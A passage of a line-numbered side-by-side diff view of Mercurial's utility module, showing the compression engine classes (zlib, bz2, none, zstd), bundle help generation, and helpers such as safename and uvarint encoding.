3439 engine.name())
3442 return engine
3440 return engine
3443
3441
3444 def supportedwireengines(self, role, onlyavailable=True):
3442 def supportedwireengines(self, role, onlyavailable=True):
3445 """Obtain compression engines that support the wire protocol.
3443 """Obtain compression engines that support the wire protocol.
3446
3444
3447 Returns a list of engines in prioritized order, most desired first.
3445 Returns a list of engines in prioritized order, most desired first.
3448
3446
3449 If ``onlyavailable`` is set, filter out engines that can't be
3447 If ``onlyavailable`` is set, filter out engines that can't be
3450 loaded.
3448 loaded.
3451 """
3449 """
3452 assert role in (SERVERROLE, CLIENTROLE)
3450 assert role in (SERVERROLE, CLIENTROLE)
3453
3451
3454 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3452 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3455
3453
3456 engines = [self._engines[e] for e in self._wiretypes.values()]
3454 engines = [self._engines[e] for e in self._wiretypes.values()]
3457 if onlyavailable:
3455 if onlyavailable:
3458 engines = [e for e in engines if e.available()]
3456 engines = [e for e in engines if e.available()]
3459
3457
3460 def getkey(e):
3458 def getkey(e):
3461 # Sort first by priority, highest first. In case of tie, sort
3459 # Sort first by priority, highest first. In case of tie, sort
3462 # alphabetically. This is arbitrary, but ensures output is
3460 # alphabetically. This is arbitrary, but ensures output is
3463 # stable.
3461 # stable.
3464 w = e.wireprotosupport()
3462 w = e.wireprotosupport()
3465 return -1 * getattr(w, attr), w.name
3463 return -1 * getattr(w, attr), w.name
3466
3464
3467 return list(sorted(engines, key=getkey))
3465 return list(sorted(engines, key=getkey))
3468
3466
3469 def forwiretype(self, wiretype):
3467 def forwiretype(self, wiretype):
3470 engine = self._engines[self._wiretypes[wiretype]]
3468 engine = self._engines[self._wiretypes[wiretype]]
3471 if not engine.available():
3469 if not engine.available():
3472 raise error.Abort(_('compression engine %s could not be loaded') %
3470 raise error.Abort(_('compression engine %s could not be loaded') %
3473 engine.name())
3471 engine.name())
3474 return engine
3472 return engine
3475
3473
3476 def forrevlogheader(self, header):
3474 def forrevlogheader(self, header):
3477 """Obtain a compression engine registered to a revlog header.
3475 """Obtain a compression engine registered to a revlog header.
3478
3476
3479 Will raise KeyError if the revlog header value isn't registered.
3477 Will raise KeyError if the revlog header value isn't registered.
3480 """
3478 """
3481 return self._engines[self._revlogheaders[header]]
3479 return self._engines[self._revlogheaders[header]]
3482
3480
3483 compengines = compressormanager()
3481 compengines = compressormanager()
3484
3482
3485 class compressionengine(object):
3483 class compressionengine(object):
3486 """Base class for compression engines.
3484 """Base class for compression engines.
3487
3485
3488 Compression engines must implement the interface defined by this class.
3486 Compression engines must implement the interface defined by this class.
3489 """
3487 """
3490 def name(self):
3488 def name(self):
3491 """Returns the name of the compression engine.
3489 """Returns the name of the compression engine.
3492
3490
3493 This is the key the engine is registered under.
3491 This is the key the engine is registered under.
3494
3492
3495 This method must be implemented.
3493 This method must be implemented.
3496 """
3494 """
3497 raise NotImplementedError()
3495 raise NotImplementedError()
3498
3496
3499 def available(self):
3497 def available(self):
3500 """Whether the compression engine is available.
3498 """Whether the compression engine is available.
3501
3499
3502 The intent of this method is to allow optional compression engines
3500 The intent of this method is to allow optional compression engines
3503 that may not be available in all installations (such as engines relying
3501 that may not be available in all installations (such as engines relying
3504 on C extensions that may not be present).
3502 on C extensions that may not be present).
3505 """
3503 """
3506 return True
3504 return True
3507
3505
3508 def bundletype(self):
3506 def bundletype(self):
3509 """Describes bundle identifiers for this engine.
3507 """Describes bundle identifiers for this engine.
3510
3508
3511 If this compression engine isn't supported for bundles, returns None.
3509 If this compression engine isn't supported for bundles, returns None.
3512
3510
3513 If this engine can be used for bundles, returns a 2-tuple of strings of
3511 If this engine can be used for bundles, returns a 2-tuple of strings of
3514 the user-facing "bundle spec" compression name and an internal
3512 the user-facing "bundle spec" compression name and an internal
3515 identifier used to denote the compression format within bundles. To
3513 identifier used to denote the compression format within bundles. To
3516 exclude the name from external usage, set the first element to ``None``.
3514 exclude the name from external usage, set the first element to ``None``.
3517
3515
3518 If bundle compression is supported, the class must also implement
3516 If bundle compression is supported, the class must also implement
3519 ``compressstream`` and `decompressorreader``.
3517 ``compressstream`` and `decompressorreader``.
3520
3518
3521 The docstring of this method is used in the help system to tell users
3519 The docstring of this method is used in the help system to tell users
3522 about this engine.
3520 about this engine.
3523 """
3521 """
3524 return None
3522 return None
3525
3523
3526 def wireprotosupport(self):
3524 def wireprotosupport(self):
3527 """Declare support for this compression format on the wire protocol.
3525 """Declare support for this compression format on the wire protocol.
3528
3526
3529 If this compression engine isn't supported for compressing wire
3527 If this compression engine isn't supported for compressing wire
3530 protocol payloads, returns None.
3528 protocol payloads, returns None.
3531
3529
3532 Otherwise, returns ``compenginewireprotosupport`` with the following
3530 Otherwise, returns ``compenginewireprotosupport`` with the following
3533 fields:
3531 fields:
3534
3532
3535 * String format identifier
3533 * String format identifier
3536 * Integer priority for the server
3534 * Integer priority for the server
3537 * Integer priority for the client
3535 * Integer priority for the client
3538
3536
3539 The integer priorities are used to order the advertisement of format
3537 The integer priorities are used to order the advertisement of format
3540 support by server and client. The highest integer is advertised
3538 support by server and client. The highest integer is advertised
3541 first. Integers with non-positive values aren't advertised.
3539 first. Integers with non-positive values aren't advertised.
3542
3540
3543 The priority values are somewhat arbitrary and only used for default
3541 The priority values are somewhat arbitrary and only used for default
3544 ordering. The relative order can be changed via config options.
3542 ordering. The relative order can be changed via config options.
3545
3543
3546 If wire protocol compression is supported, the class must also implement
3544 If wire protocol compression is supported, the class must also implement
3547 ``compressstream`` and ``decompressorreader``.
3545 ``compressstream`` and ``decompressorreader``.
3548 """
3546 """
3549 return None
3547 return None
3550
3548
3551 def revlogheader(self):
3549 def revlogheader(self):
3552 """Header added to revlog chunks that identifies this engine.
3550 """Header added to revlog chunks that identifies this engine.
3553
3551
3554 If this engine can be used to compress revlogs, this method should
3552 If this engine can be used to compress revlogs, this method should
3555 return the bytes used to identify chunks compressed with this engine.
3553 return the bytes used to identify chunks compressed with this engine.
3556 Else, the method should return ``None`` to indicate it does not
3554 Else, the method should return ``None`` to indicate it does not
3557 participate in revlog compression.
3555 participate in revlog compression.
3558 """
3556 """
3559 return None
3557 return None
3560
3558
3561 def compressstream(self, it, opts=None):
3559 def compressstream(self, it, opts=None):
3562 """Compress an iterator of chunks.
3560 """Compress an iterator of chunks.
3563
3561
3564 The method receives an iterator (ideally a generator) of chunks of
3562 The method receives an iterator (ideally a generator) of chunks of
3565 bytes to be compressed. It returns an iterator (ideally a generator)
3563 bytes to be compressed. It returns an iterator (ideally a generator)
3566 of bytes of chunks representing the compressed output.
3564 of bytes of chunks representing the compressed output.
3567
3565
3568 Optionally accepts an argument defining how to perform compression.
3566 Optionally accepts an argument defining how to perform compression.
3569 Each engine treats this argument differently.
3567 Each engine treats this argument differently.
3570 """
3568 """
3571 raise NotImplementedError()
3569 raise NotImplementedError()
3572
3570
3573 def decompressorreader(self, fh):
3571 def decompressorreader(self, fh):
3574 """Perform decompression on a file object.
3572 """Perform decompression on a file object.
3575
3573
3576 Argument is an object with a ``read(size)`` method that returns
3574 Argument is an object with a ``read(size)`` method that returns
3577 compressed data. Return value is an object with a ``read(size)`` that
3575 compressed data. Return value is an object with a ``read(size)`` that
3578 returns uncompressed data.
3576 returns uncompressed data.
3579 """
3577 """
3580 raise NotImplementedError()
3578 raise NotImplementedError()
3581
3579
3582 def revlogcompressor(self, opts=None):
3580 def revlogcompressor(self, opts=None):
3583 """Obtain an object that can be used to compress revlog entries.
3581 """Obtain an object that can be used to compress revlog entries.
3584
3582
3585 The object has a ``compress(data)`` method that compresses binary
3583 The object has a ``compress(data)`` method that compresses binary
3586 data. This method returns compressed binary data or ``None`` if
3584 data. This method returns compressed binary data or ``None`` if
3587 the data could not be compressed (too small, not compressible, etc).
3585 the data could not be compressed (too small, not compressible, etc).
3588 The returned data should have a header uniquely identifying this
3586 The returned data should have a header uniquely identifying this
3589 compression format so decompression can be routed to this engine.
3587 compression format so decompression can be routed to this engine.
3590 This header should be identified by the ``revlogheader()`` return
3588 This header should be identified by the ``revlogheader()`` return
3591 value.
3589 value.
3592
3590
3593 The object has a ``decompress(data)`` method that decompresses
3591 The object has a ``decompress(data)`` method that decompresses
3594 data. The method will only be called if ``data`` begins with
3592 data. The method will only be called if ``data`` begins with
3595 ``revlogheader()``. The method should return the raw, uncompressed
3593 ``revlogheader()``. The method should return the raw, uncompressed
3596 data or raise a ``RevlogError``.
3594 data or raise a ``RevlogError``.
3597
3595
3598 The object is reusable but is not thread safe.
3596 The object is reusable but is not thread safe.
3599 """
3597 """
3600 raise NotImplementedError()
3598 raise NotImplementedError()
3601
3599
3602 class _zlibengine(compressionengine):
3600 class _zlibengine(compressionengine):
3603 def name(self):
3601 def name(self):
3604 return 'zlib'
3602 return 'zlib'
3605
3603
3606 def bundletype(self):
3604 def bundletype(self):
3607 """zlib compression using the DEFLATE algorithm.
3605 """zlib compression using the DEFLATE algorithm.
3608
3606
3609 All Mercurial clients should support this format. The compression
3607 All Mercurial clients should support this format. The compression
3610 algorithm strikes a reasonable balance between compression ratio
3608 algorithm strikes a reasonable balance between compression ratio
3611 and size.
3609 and size.
3612 """
3610 """
3613 return 'gzip', 'GZ'
3611 return 'gzip', 'GZ'
3614
3612
3615 def wireprotosupport(self):
3613 def wireprotosupport(self):
3616 return compewireprotosupport('zlib', 20, 20)
3614 return compewireprotosupport('zlib', 20, 20)
3617
3615
3618 def revlogheader(self):
3616 def revlogheader(self):
3619 return 'x'
3617 return 'x'
3620
3618
3621 def compressstream(self, it, opts=None):
3619 def compressstream(self, it, opts=None):
3622 opts = opts or {}
3620 opts = opts or {}
3623
3621
3624 z = zlib.compressobj(opts.get('level', -1))
3622 z = zlib.compressobj(opts.get('level', -1))
3625 for chunk in it:
3623 for chunk in it:
3626 data = z.compress(chunk)
3624 data = z.compress(chunk)
3627 # Not all calls to compress emit data. It is cheaper to inspect
3625 # Not all calls to compress emit data. It is cheaper to inspect
3628 # here than to feed empty chunks through generator.
3626 # here than to feed empty chunks through generator.
3629 if data:
3627 if data:
3630 yield data
3628 yield data
3631
3629
3632 yield z.flush()
3630 yield z.flush()
3633
3631
3634 def decompressorreader(self, fh):
3632 def decompressorreader(self, fh):
3635 def gen():
3633 def gen():
3636 d = zlib.decompressobj()
3634 d = zlib.decompressobj()
3637 for chunk in filechunkiter(fh):
3635 for chunk in filechunkiter(fh):
3638 while chunk:
3636 while chunk:
3639 # Limit output size to limit memory.
3637 # Limit output size to limit memory.
3640 yield d.decompress(chunk, 2 ** 18)
3638 yield d.decompress(chunk, 2 ** 18)
3641 chunk = d.unconsumed_tail
3639 chunk = d.unconsumed_tail
3642
3640
3643 return chunkbuffer(gen())
3641 return chunkbuffer(gen())
3644
3642
3645 class zlibrevlogcompressor(object):
3643 class zlibrevlogcompressor(object):
3646 def compress(self, data):
3644 def compress(self, data):
3647 insize = len(data)
3645 insize = len(data)
3648 # Caller handles empty input case.
3646 # Caller handles empty input case.
3649 assert insize > 0
3647 assert insize > 0
3650
3648
3651 if insize < 44:
3649 if insize < 44:
3652 return None
3650 return None
3653
3651
3654 elif insize <= 1000000:
3652 elif insize <= 1000000:
3655 compressed = zlib.compress(data)
3653 compressed = zlib.compress(data)
3656 if len(compressed) < insize:
3654 if len(compressed) < insize:
3657 return compressed
3655 return compressed
3658 return None
3656 return None
3659
3657
3660 # zlib makes an internal copy of the input buffer, doubling
3658 # zlib makes an internal copy of the input buffer, doubling
3661 # memory usage for large inputs. So do streaming compression
3659 # memory usage for large inputs. So do streaming compression
3662 # on large inputs.
3660 # on large inputs.
3663 else:
3661 else:
3664 z = zlib.compressobj()
3662 z = zlib.compressobj()
3665 parts = []
3663 parts = []
3666 pos = 0
3664 pos = 0
3667 while pos < insize:
3665 while pos < insize:
3668 pos2 = pos + 2**20
3666 pos2 = pos + 2**20
3669 parts.append(z.compress(data[pos:pos2]))
3667 parts.append(z.compress(data[pos:pos2]))
3670 pos = pos2
3668 pos = pos2
3671 parts.append(z.flush())
3669 parts.append(z.flush())
3672
3670
3673 if sum(map(len, parts)) < insize:
3671 if sum(map(len, parts)) < insize:
3674 return ''.join(parts)
3672 return ''.join(parts)
3675 return None
3673 return None
3676
3674
3677 def decompress(self, data):
3675 def decompress(self, data):
3678 try:
3676 try:
3679 return zlib.decompress(data)
3677 return zlib.decompress(data)
3680 except zlib.error as e:
3678 except zlib.error as e:
3681 raise error.RevlogError(_('revlog decompress error: %s') %
3679 raise error.RevlogError(_('revlog decompress error: %s') %
3682 stringutil.forcebytestr(e))
3680 stringutil.forcebytestr(e))
3683
3681
3684 def revlogcompressor(self, opts=None):
3682 def revlogcompressor(self, opts=None):
3685 return self.zlibrevlogcompressor()
3683 return self.zlibrevlogcompressor()
3686
3684
3687 compengines.register(_zlibengine())
3685 compengines.register(_zlibengine())
3688
3686
3689 class _bz2engine(compressionengine):
3687 class _bz2engine(compressionengine):
3690 def name(self):
3688 def name(self):
3691 return 'bz2'
3689 return 'bz2'
3692
3690
3693 def bundletype(self):
3691 def bundletype(self):
3694 """An algorithm that produces smaller bundles than ``gzip``.
3692 """An algorithm that produces smaller bundles than ``gzip``.
3695
3693
3696 All Mercurial clients should support this format.
3694 All Mercurial clients should support this format.
3697
3695
3698 This engine will likely produce smaller bundles than ``gzip`` but
3696 This engine will likely produce smaller bundles than ``gzip`` but
3699 will be significantly slower, both during compression and
3697 will be significantly slower, both during compression and
3700 decompression.
3698 decompression.
3701
3699
3702 If available, the ``zstd`` engine can yield similar or better
3700 If available, the ``zstd`` engine can yield similar or better
3703 compression at much higher speeds.
3701 compression at much higher speeds.
3704 """
3702 """
3705 return 'bzip2', 'BZ'
3703 return 'bzip2', 'BZ'
3706
3704
3707 # We declare a protocol name but don't advertise by default because
3705 # We declare a protocol name but don't advertise by default because
3708 # it is slow.
3706 # it is slow.
3709 def wireprotosupport(self):
3707 def wireprotosupport(self):
3710 return compewireprotosupport('bzip2', 0, 0)
3708 return compewireprotosupport('bzip2', 0, 0)
3711
3709
3712 def compressstream(self, it, opts=None):
3710 def compressstream(self, it, opts=None):
3713 opts = opts or {}
3711 opts = opts or {}
3714 z = bz2.BZ2Compressor(opts.get('level', 9))
3712 z = bz2.BZ2Compressor(opts.get('level', 9))
3715 for chunk in it:
3713 for chunk in it:
3716 data = z.compress(chunk)
3714 data = z.compress(chunk)
3717 if data:
3715 if data:
3718 yield data
3716 yield data
3719
3717
3720 yield z.flush()
3718 yield z.flush()
3721
3719
3722 def decompressorreader(self, fh):
3720 def decompressorreader(self, fh):
3723 def gen():
3721 def gen():
3724 d = bz2.BZ2Decompressor()
3722 d = bz2.BZ2Decompressor()
3725 for chunk in filechunkiter(fh):
3723 for chunk in filechunkiter(fh):
3726 yield d.decompress(chunk)
3724 yield d.decompress(chunk)
3727
3725
3728 return chunkbuffer(gen())
3726 return chunkbuffer(gen())
3729
3727
3730 compengines.register(_bz2engine())
3728 compengines.register(_bz2engine())
3731
3729
3732 class _truncatedbz2engine(compressionengine):
3730 class _truncatedbz2engine(compressionengine):
3733 def name(self):
3731 def name(self):
3734 return 'bz2truncated'
3732 return 'bz2truncated'
3735
3733
3736 def bundletype(self):
3734 def bundletype(self):
3737 return None, '_truncatedBZ'
3735 return None, '_truncatedBZ'
3738
3736
3739 # We don't implement compressstream because it is hackily handled elsewhere.
3737 # We don't implement compressstream because it is hackily handled elsewhere.
3740
3738
3741 def decompressorreader(self, fh):
3739 def decompressorreader(self, fh):
3742 def gen():
3740 def gen():
3743 # The input stream doesn't have the 'BZ' header. So add it back.
3741 # The input stream doesn't have the 'BZ' header. So add it back.
3744 d = bz2.BZ2Decompressor()
3742 d = bz2.BZ2Decompressor()
3745 d.decompress('BZ')
3743 d.decompress('BZ')
3746 for chunk in filechunkiter(fh):
3744 for chunk in filechunkiter(fh):
3747 yield d.decompress(chunk)
3745 yield d.decompress(chunk)
3748
3746
3749 return chunkbuffer(gen())
3747 return chunkbuffer(gen())
3750
3748
3751 compengines.register(_truncatedbz2engine())
3749 compengines.register(_truncatedbz2engine())
3752
3750
3753 class _noopengine(compressionengine):
3751 class _noopengine(compressionengine):
3754 def name(self):
3752 def name(self):
3755 return 'none'
3753 return 'none'
3756
3754
3757 def bundletype(self):
3755 def bundletype(self):
3758 """No compression is performed.
3756 """No compression is performed.
3759
3757
3760 Use this compression engine to explicitly disable compression.
3758 Use this compression engine to explicitly disable compression.
3761 """
3759 """
3762 return 'none', 'UN'
3760 return 'none', 'UN'
3763
3761
3764 # Clients always support uncompressed payloads. Servers don't because
3762 # Clients always support uncompressed payloads. Servers don't because
3765 # unless you are on a fast network, uncompressed payloads can easily
3763 # unless you are on a fast network, uncompressed payloads can easily
3766 # saturate your network pipe.
3764 # saturate your network pipe.
3767 def wireprotosupport(self):
3765 def wireprotosupport(self):
3768 return compewireprotosupport('none', 0, 10)
3766 return compewireprotosupport('none', 0, 10)
3769
3767
3770 # We don't implement revlogheader because it is handled specially
3768 # We don't implement revlogheader because it is handled specially
3771 # in the revlog class.
3769 # in the revlog class.
3772
3770
3773 def compressstream(self, it, opts=None):
3771 def compressstream(self, it, opts=None):
3774 return it
3772 return it
3775
3773
3776 def decompressorreader(self, fh):
3774 def decompressorreader(self, fh):
3777 return fh
3775 return fh
3778
3776
3779 class nooprevlogcompressor(object):
3777 class nooprevlogcompressor(object):
3780 def compress(self, data):
3778 def compress(self, data):
3781 return None
3779 return None
3782
3780
3783 def revlogcompressor(self, opts=None):
3781 def revlogcompressor(self, opts=None):
3784 return self.nooprevlogcompressor()
3782 return self.nooprevlogcompressor()
3785
3783
3786 compengines.register(_noopengine())
3784 compengines.register(_noopengine())
3787
3785
3788 class _zstdengine(compressionengine):
3786 class _zstdengine(compressionengine):
3789 def name(self):
3787 def name(self):
3790 return 'zstd'
3788 return 'zstd'
3791
3789
3792 @propertycache
3790 @propertycache
3793 def _module(self):
3791 def _module(self):
3794 # Not all installs have the zstd module available. So defer importing
3792 # Not all installs have the zstd module available. So defer importing
3795 # until first access.
3793 # until first access.
3796 try:
3794 try:
3797 from . import zstd
3795 from . import zstd
3798 # Force delayed import.
3796 # Force delayed import.
3799 zstd.__version__
3797 zstd.__version__
3800 return zstd
3798 return zstd
3801 except ImportError:
3799 except ImportError:
3802 return None
3800 return None
3803
3801
3804 def available(self):
3802 def available(self):
3805 return bool(self._module)
3803 return bool(self._module)
3806
3804
3807 def bundletype(self):
3805 def bundletype(self):
3808 """A modern compression algorithm that is fast and highly flexible.
3806 """A modern compression algorithm that is fast and highly flexible.
3809
3807
3810 Only supported by Mercurial 4.1 and newer clients.
3808 Only supported by Mercurial 4.1 and newer clients.
3811
3809
3812 With the default settings, zstd compression is both faster and yields
3810 With the default settings, zstd compression is both faster and yields
3813 better compression than ``gzip``. It also frequently yields better
3811 better compression than ``gzip``. It also frequently yields better
3814 compression than ``bzip2`` while operating at much higher speeds.
3812 compression than ``bzip2`` while operating at much higher speeds.
3815
3813
3816 If this engine is available and backwards compatibility is not a
3814 If this engine is available and backwards compatibility is not a
3817 concern, it is likely the best available engine.
3815 concern, it is likely the best available engine.
3818 """
3816 """
3819 return 'zstd', 'ZS'
3817 return 'zstd', 'ZS'
3820
3818
3821 def wireprotosupport(self):
3819 def wireprotosupport(self):
3822 return compewireprotosupport('zstd', 50, 50)
3820 return compewireprotosupport('zstd', 50, 50)
3823
3821
3824 def revlogheader(self):
3822 def revlogheader(self):
3825 return '\x28'
3823 return '\x28'
3826
3824
3827 def compressstream(self, it, opts=None):
3825 def compressstream(self, it, opts=None):
3828 opts = opts or {}
3826 opts = opts or {}
3829 # zstd level 3 is almost always significantly faster than zlib
3827 # zstd level 3 is almost always significantly faster than zlib
3830 # while providing no worse compression. It strikes a good balance
3828 # while providing no worse compression. It strikes a good balance
3831 # between speed and compression.
3829 # between speed and compression.
3832 level = opts.get('level', 3)
3830 level = opts.get('level', 3)
3833
3831
3834 zstd = self._module
3832 zstd = self._module
3835 z = zstd.ZstdCompressor(level=level).compressobj()
3833 z = zstd.ZstdCompressor(level=level).compressobj()
3836 for chunk in it:
3834 for chunk in it:
3837 data = z.compress(chunk)
3835 data = z.compress(chunk)
3838 if data:
3836 if data:
3839 yield data
3837 yield data
3840
3838
3841 yield z.flush()
3839 yield z.flush()
3842
3840
3843 def decompressorreader(self, fh):
3841 def decompressorreader(self, fh):
3844 zstd = self._module
3842 zstd = self._module
3845 dctx = zstd.ZstdDecompressor()
3843 dctx = zstd.ZstdDecompressor()
3846 return chunkbuffer(dctx.read_from(fh))
3844 return chunkbuffer(dctx.read_from(fh))
3847
3845
3848 class zstdrevlogcompressor(object):
3846 class zstdrevlogcompressor(object):
3849 def __init__(self, zstd, level=3):
3847 def __init__(self, zstd, level=3):
3850 # Writing the content size adds a few bytes to the output. However,
3848 # Writing the content size adds a few bytes to the output. However,
3851 # it allows decompression to be more optimal since we can
3849 # it allows decompression to be more optimal since we can
3852 # pre-allocate a buffer to hold the result.
3850 # pre-allocate a buffer to hold the result.
3853 self._cctx = zstd.ZstdCompressor(level=level,
3851 self._cctx = zstd.ZstdCompressor(level=level,
3854 write_content_size=True)
3852 write_content_size=True)
3855 self._dctx = zstd.ZstdDecompressor()
3853 self._dctx = zstd.ZstdDecompressor()
3856 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3854 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3857 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3855 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3858
3856
3859 def compress(self, data):
3857 def compress(self, data):
3860 insize = len(data)
3858 insize = len(data)
3861 # Caller handles empty input case.
3859 # Caller handles empty input case.
3862 assert insize > 0
3860 assert insize > 0
3863
3861
3864 if insize < 50:
3862 if insize < 50:
3865 return None
3863 return None
3866
3864
3867 elif insize <= 1000000:
3865 elif insize <= 1000000:
3868 compressed = self._cctx.compress(data)
3866 compressed = self._cctx.compress(data)
3869 if len(compressed) < insize:
3867 if len(compressed) < insize:
3870 return compressed
3868 return compressed
3871 return None
3869 return None
3872 else:
3870 else:
3873 z = self._cctx.compressobj()
3871 z = self._cctx.compressobj()
3874 chunks = []
3872 chunks = []
3875 pos = 0
3873 pos = 0
3876 while pos < insize:
3874 while pos < insize:
3877 pos2 = pos + self._compinsize
3875 pos2 = pos + self._compinsize
3878 chunk = z.compress(data[pos:pos2])
3876 chunk = z.compress(data[pos:pos2])
3879 if chunk:
3877 if chunk:
3880 chunks.append(chunk)
3878 chunks.append(chunk)
3881 pos = pos2
3879 pos = pos2
3882 chunks.append(z.flush())
3880 chunks.append(z.flush())
3883
3881
3884 if sum(map(len, chunks)) < insize:
3882 if sum(map(len, chunks)) < insize:
3885 return ''.join(chunks)
3883 return ''.join(chunks)
3886 return None
3884 return None
3887
3885
3888 def decompress(self, data):
3886 def decompress(self, data):
3889 insize = len(data)
3887 insize = len(data)
3890
3888
3891 try:
3889 try:
3892 # This was measured to be faster than other streaming
3890 # This was measured to be faster than other streaming
3893 # decompressors.
3891 # decompressors.
3894 dobj = self._dctx.decompressobj()
3892 dobj = self._dctx.decompressobj()
3895 chunks = []
3893 chunks = []
3896 pos = 0
3894 pos = 0
3897 while pos < insize:
3895 while pos < insize:
3898 pos2 = pos + self._decompinsize
3896 pos2 = pos + self._decompinsize
3899 chunk = dobj.decompress(data[pos:pos2])
3897 chunk = dobj.decompress(data[pos:pos2])
3900 if chunk:
3898 if chunk:
3901 chunks.append(chunk)
3899 chunks.append(chunk)
3902 pos = pos2
3900 pos = pos2
3903 # Frame should be exhausted, so no finish() API.
3901 # Frame should be exhausted, so no finish() API.
3904
3902
3905 return ''.join(chunks)
3903 return ''.join(chunks)
3906 except Exception as e:
3904 except Exception as e:
3907 raise error.RevlogError(_('revlog decompress error: %s') %
3905 raise error.RevlogError(_('revlog decompress error: %s') %
3908 stringutil.forcebytestr(e))
3906 stringutil.forcebytestr(e))
3909
3907
3910 def revlogcompressor(self, opts=None):
3908 def revlogcompressor(self, opts=None):
3911 opts = opts or {}
3909 opts = opts or {}
3912 return self.zstdrevlogcompressor(self._module,
3910 return self.zstdrevlogcompressor(self._module,
3913 level=opts.get('level', 3))
3911 level=opts.get('level', 3))
3914
3912
3915 compengines.register(_zstdengine())
3913 compengines.register(_zstdengine())
3916
3914
3917 def bundlecompressiontopics():
3915 def bundlecompressiontopics():
3918 """Obtains a list of available bundle compressions for use in help."""
3916 """Obtains a list of available bundle compressions for use in help."""
3919 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3917 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3920 items = {}
3918 items = {}
3921
3919
3922 # We need to format the docstring. So use a dummy object/type to hold it
3920 # We need to format the docstring. So use a dummy object/type to hold it
3923 # rather than mutating the original.
3921 # rather than mutating the original.
3924 class docobject(object):
3922 class docobject(object):
3925 pass
3923 pass
3926
3924
3927 for name in compengines:
3925 for name in compengines:
3928 engine = compengines[name]
3926 engine = compengines[name]
3929
3927
3930 if not engine.available():
3928 if not engine.available():
3931 continue
3929 continue
3932
3930
3933 bt = engine.bundletype()
3931 bt = engine.bundletype()
3934 if not bt or not bt[0]:
3932 if not bt or not bt[0]:
3935 continue
3933 continue
3936
3934
3937 doc = pycompat.sysstr('``%s``\n %s') % (
3935 doc = pycompat.sysstr('``%s``\n %s') % (
3938 bt[0], engine.bundletype.__doc__)
3936 bt[0], engine.bundletype.__doc__)
3939
3937
3940 value = docobject()
3938 value = docobject()
3941 value.__doc__ = doc
3939 value.__doc__ = doc
3942 value._origdoc = engine.bundletype.__doc__
3940 value._origdoc = engine.bundletype.__doc__
3943 value._origfunc = engine.bundletype
3941 value._origfunc = engine.bundletype
3944
3942
3945 items[bt[0]] = value
3943 items[bt[0]] = value
3946
3944
3947 return items
3945 return items
3948
3946
3949 i18nfunctions = bundlecompressiontopics().values()
3947 i18nfunctions = bundlecompressiontopics().values()
3950
3948
3951 # convenient shortcut
3949 # convenient shortcut
3952 dst = debugstacktrace
3950 dst = debugstacktrace
3953
3951
3954 def safename(f, tag, ctx, others=None):
3952 def safename(f, tag, ctx, others=None):
3955 """
3953 """
3956 Generate a name that it is safe to rename f to in the given context.
3954 Generate a name that it is safe to rename f to in the given context.
3957
3955
3958 f: filename to rename
3956 f: filename to rename
3959 tag: a string tag that will be included in the new name
3957 tag: a string tag that will be included in the new name
3960 ctx: a context, in which the new name must not exist
3958 ctx: a context, in which the new name must not exist
3961 others: a set of other filenames that the new name must not be in
3959 others: a set of other filenames that the new name must not be in
3962
3960
3963 Returns a file name of the form oldname~tag[~number] which does not exist
3961 Returns a file name of the form oldname~tag[~number] which does not exist
3964 in the provided context and is not in the set of other names.
3962 in the provided context and is not in the set of other names.
3965 """
3963 """
3966 if others is None:
3964 if others is None:
3967 others = set()
3965 others = set()
3968
3966
3969 fn = '%s~%s' % (f, tag)
3967 fn = '%s~%s' % (f, tag)
3970 if fn not in ctx and fn not in others:
3968 if fn not in ctx and fn not in others:
3971 return fn
3969 return fn
3972 for n in itertools.count(1):
3970 for n in itertools.count(1):
3973 fn = '%s~%s~%s' % (f, tag, n)
3971 fn = '%s~%s~%s' % (f, tag, n)
3974 if fn not in ctx and fn not in others:
3972 if fn not in ctx and fn not in others:
3975 return fn
3973 return fn
3976
3974
3977 def readexactly(stream, n):
3975 def readexactly(stream, n):
3978 '''read n bytes from stream.read and abort if less was available'''
3976 '''read n bytes from stream.read and abort if less was available'''
3979 s = stream.read(n)
3977 s = stream.read(n)
3980 if len(s) < n:
3978 if len(s) < n:
3981 raise error.Abort(_("stream ended unexpectedly"
3979 raise error.Abort(_("stream ended unexpectedly"
3982 " (got %d bytes, expected %d)")
3980 " (got %d bytes, expected %d)")
3983 % (len(s), n))
3981 % (len(s), n))
3984 return s
3982 return s
3985
3983
3986 def uvarintencode(value):
3984 def uvarintencode(value):
3987 """Encode an unsigned integer value to a varint.
3985 """Encode an unsigned integer value to a varint.
3988
3986
3989 A varint is a variable length integer of 1 or more bytes. Each byte
3987 A varint is a variable length integer of 1 or more bytes. Each byte
3990 except the last has the most significant bit set. The lower 7 bits of
3988 except the last has the most significant bit set. The lower 7 bits of
3991 each byte store the 2's complement representation, least significant group
3989 each byte store the 2's complement representation, least significant group
3992 first.
3990 first.
3993
3991
3994 >>> uvarintencode(0)
3992 >>> uvarintencode(0)
3995 '\\x00'
3993 '\\x00'
3996 >>> uvarintencode(1)
3994 >>> uvarintencode(1)
3997 '\\x01'
3995 '\\x01'
3998 >>> uvarintencode(127)
3996 >>> uvarintencode(127)
3999 '\\x7f'
3997 '\\x7f'
4000 >>> uvarintencode(1337)
3998 >>> uvarintencode(1337)
4001 '\\xb9\\n'
3999 '\\xb9\\n'
4002 >>> uvarintencode(65536)
4000 >>> uvarintencode(65536)
4003 '\\x80\\x80\\x04'
4001 '\\x80\\x80\\x04'
4004 >>> uvarintencode(-1)
4002 >>> uvarintencode(-1)
4005 Traceback (most recent call last):
4003 Traceback (most recent call last):
4006 ...
4004 ...
4007 ProgrammingError: negative value for uvarint: -1
4005 ProgrammingError: negative value for uvarint: -1
4008 """
4006 """
4009 if value < 0:
4007 if value < 0:
4010 raise error.ProgrammingError('negative value for uvarint: %d'
4008 raise error.ProgrammingError('negative value for uvarint: %d'
4011 % value)
4009 % value)
4012 bits = value & 0x7f
4010 bits = value & 0x7f
4013 value >>= 7
4011 value >>= 7
4014 bytes = []
4012 bytes = []
4015 while value:
4013 while value:
4016 bytes.append(pycompat.bytechr(0x80 | bits))
4014 bytes.append(pycompat.bytechr(0x80 | bits))
4017 bits = value & 0x7f
4015 bits = value & 0x7f
